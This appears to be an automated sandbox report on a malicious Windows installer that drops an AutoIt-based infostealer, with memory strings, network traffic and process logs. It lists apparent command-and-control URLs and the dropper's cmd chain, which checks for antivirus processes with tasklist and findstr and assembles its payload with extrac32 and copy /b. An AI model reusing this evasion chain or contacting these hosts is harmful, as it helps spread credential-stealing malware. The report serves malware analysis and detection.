Source: Luther.com, 0000000D.00000003.2271884207.00000000038D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Luther.com, 0000000D.00000003.2271884207.00000000038D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: installer_1.05_37.4.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: installer_1.05_37.4.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: installer_1.05_37.4.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Luther.com, 0000000D.00000003.2271884207.00000000038D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: installer_1.05_37.4.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: Luther.com, 0000000D.00000003.2271884207.00000000038D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: installer_1.05_37.4.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Luther.com, 0000000D.00000003.2271884207.00000000038D1000.00000004.00000800.00020000.00000000.sdmp, installer_1.05_37.4.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: installer_1.05_37.4.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: installer_1.05_37.4.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: installer_1.05_37.4.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: Luther.com, 0000000D.00000003.2221201231.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, Webshots.9.dr, Luther.com.2.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Luther.com, 0000000D.00000003.2271884207.00000000038D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Luther.com, 0000000D.00000003.2221201231.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, Webshots.9.dr, Luther.com.2.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Luther.com, 0000000D.00000003.2221201231.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, Webshots.9.dr, Luther.com.2.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Luther.com, 0000000D.00000003.2221201231.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, Webshots.9.dr, Luther.com.2.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: Luther.com, 0000000D.00000003.2221201231.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, Webshots.9.dr, Luther.com.2.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Luther.com, 0000000D.00000003.2221201231.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, Webshots.9.dr, Luther.com.2.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Luther.com, 0000000D.00000003.2221201231.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmp, Luther.com.2.dr, Page.9.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: installer_1.05_37.4.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: Luther.com, 0000000D.00000003.2271884207.00000000038D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Luther.com, 0000000D.00000003.2271884207.00000000038D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Luther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Luther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/
Source: Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/8574262446/ph.txt
Source: Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/8574262446/ph.txt#
Source: Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/8574262446/ph.txt?
Source: Luther.com, 0000000D.00000002.4496055520.00000000009DA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/8574262446/ph.txtebKit/537.36
Source: Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/S
Source: Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/x
Source: Luther.com, 0000000D.00000002.4497796930.0000000003A15000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop:443/8574262446/ph.txtoft
Source: Luther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Luther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Luther.com, 0000000D.00000002.4497796930.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000002.4497796930.0000000003A02000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000002.4497541378.00000000038B0000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000002.4497541378.00000000038BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dfgh.online/invoker.php?compName=
Source: Luther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Luther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Luther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Luther.com, 0000000D.00000002.4497214664.000000000145E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://goldyhanders.cyou/
Source: Luther.com, 0000000D.00000003.2271590725.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2271884207.000000000391B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goldyhanders.cyou/$40.
Source: Luther.com, 0000000D.00000002.4497214664.000000000145E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://goldyhanders.cyou/9
Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2271590725.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2260009291.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2259044723.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2288364664.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2247382365.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2271884207.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2285485834.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2247660690.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.000000000391B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goldyhanders.cyou/=
Source: Luther.com, 0000000D.00000003.2285485834.0000000003919000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goldyhanders.cyou/H
Source: Luther.com, 0000000D.00000003.2271590725.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2288364664.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2271884207.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2285485834.0000000003919000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goldyhanders.cyou/S
Source: Luther.com, 0000000D.00000002.4497214664.000000000145E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://goldyhanders.cyou/api
Source: Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goldyhanders.cyou/api.0
Source: Luther.com, 0000000D.00000003.2285485834.0000000003919000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goldyhanders.cyou/apijinh
Source: Luther.com, 0000000D.00000003.2271590725.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2271884207.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2285485834.0000000003919000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goldyhanders.cyou/apijpjb
Source: Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goldyhanders.cyou/h.
Source: Luther.com, 0000000D.00000002.4497214664.000000000145E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://goldyhanders.cyou/i
Source: Luther.com, 0000000D.00000002.4497214664.000000000145E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://goldyhanders.cyou/l
Source: Luther.com, 0000000D.00000002.4497796930.0000000003A15000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goldyhanders.cyou:443/api
Source: Luther.com, 0000000D.00000002.4497796930.0000000003A15000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goldyhanders.cyou:443/apiMicrosoft
Source: Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://klipgonuh.shop/int_clp_sha.txt
Source: Luther.com, 0000000D.00000003.2272933536.000000000525B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Luther.com, 0000000D.00000003.2272933536.000000000525B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Luther.com, 0000000D.00000003.2221201231.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, Webshots.9.dr, Luther.com.2.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Luther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Luther.com.2.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Luther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Luther.com, 0000000D.00000003.2272933536.000000000525B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: Luther.com, 0000000D.00000003.2272933536.000000000525B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: Luther.com, 0000000D.00000003.2272933536.000000000525B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Luther.com, 0000000D.00000003.2272933536.000000000525B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Luther.com, 0000000D.00000003.2272933536.000000000525B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: Luther.com, 0000000D.00000003.2272933536.000000000525B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443

Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.5:49782 version: TLS 1.2

Source: C:\Users\user\Desktop\installer_1.05_37.4.exe

Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004050CD

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

Code function: 13_2_00EAF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

13_2_00EAF7C7

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

Code function: 13_2_00EAF55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

13_2_00EAF55C

Source: C:\Users\user\Desktop\installer_1.05_37.4.exe

Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004044A5

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

Code function: 13_2_00EC9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

13_2_00EC9FD2

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

Code function: 13_2_00E4FFE0 CloseHandle,NtProtectVirtualMemory,

13_2_00E4FFE0

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

Code function: 13_2_00EA4763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,

13_2_00EA4763

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

Code function: 13_2_00E91B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

13_2_00E91B4D

Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,		0_2_00403883
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E9F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		13_2_00E9F20D

Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	File created: C:\Windows\MonoQuery	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	File created: C:\Windows\CorrespondenceSerbia	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	File created: C:\Windows\OverNodes	Jump to behavior

Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Code function: 0_2_0040497C	0_2_0040497C
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Code function: 0_2_00406ED2	0_2_00406ED2
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Code function: 0_2_004074BB	0_2_004074BB
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E58017	13_2_00E58017
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E3E1F0	13_2_00E3E1F0
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E4E144	13_2_00E4E144
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E522A2	13_2_00E522A2
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E322AD	13_2_00E322AD
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E6A26E	13_2_00E6A26E
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E4C624	13_2_00E4C624
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00EBC8A4	13_2_00EBC8A4
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E6E87F	13_2_00E6E87F
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E66ADE	13_2_00E66ADE
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00EA2A05	13_2_00EA2A05
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E98BFF	13_2_00E98BFF
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E4CD7A	13_2_00E4CD7A
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E5CE10	13_2_00E5CE10
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E67159	13_2_00E67159
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E39240	13_2_00E39240
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00EC5311	13_2_00EC5311
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E396E0	13_2_00E396E0
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E51704	13_2_00E51704
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E51A76	13_2_00E51A76
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E57B8B	13_2_00E57B8B
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E39B60	13_2_00E39B60
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E57DBA	13_2_00E57DBA
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E51D20	13_2_00E51D20
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E51FE7	13_2_00E51FE7

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\224553\Luther.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: String function: 00E50DA0 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: String function: 00E4FD52 appears 40 times
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Code function: String function: 004062A3 appears 58 times

Source: installer_1.05_37.4.exe

Static PE information: invalid certificate

Source: installer_1.05_37.4.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@26/22@3/2

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

Code function: 13_2_00EA41FA GetLastError,FormatMessageW,

13_2_00EA41FA

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E92010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		13_2_00E92010
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E91A0B AdjustTokenPrivileges,CloseHandle,		13_2_00E91A0B

Source: C:\Users\user\Desktop\installer_1.05_37.4.exe

0_2_004044A5

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

Code function: 13_2_00E9DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

13_2_00E9DD87

Source: C:\Users\user\Desktop\installer_1.05_37.4.exe

Code function: 0_2_004024FB CoCreateInstance,

0_2_004024FB

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

Code function: 13_2_00EA3A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

13_2_00EA3A0E

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03

Source: C:\Users\user\Desktop\installer_1.05_37.4.exe

File created: C:\Users\user\AppData\Local\Temp\nsx76B1.tmp

Jump to behavior

Source: installer_1.05_37.4.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\installer_1.05_37.4.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\installer_1.05_37.4.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Luther.com, 0000000D.00000003.2260009291.00000000038C9000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2260290711.0000000003A52000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2247461387.00000000038BA000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2247094175.0000000003A40000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: installer_1.05_37.4.exe	Virustotal: Detection: 13%
Source: installer_1.05_37.4.exe	ReversingLabs: Detection: 23%

Source: C:\Users\user\Desktop\installer_1.05_37.4.exe

File read: C:\Users\user\Desktop\installer_1.05_37.4.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\installer_1.05_37.4.exe "C:\Users\user\Desktop\installer_1.05_37.4.exe"
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Unexpected Unexpected.cmd & Unexpected.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 224553
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Choosing
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Readily" Departure
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 224553\Luther.com + Remote + Priorities + Cho + Reliability + Rating + Dot + Holocaust + Page + Webshots 224553\Luther.com
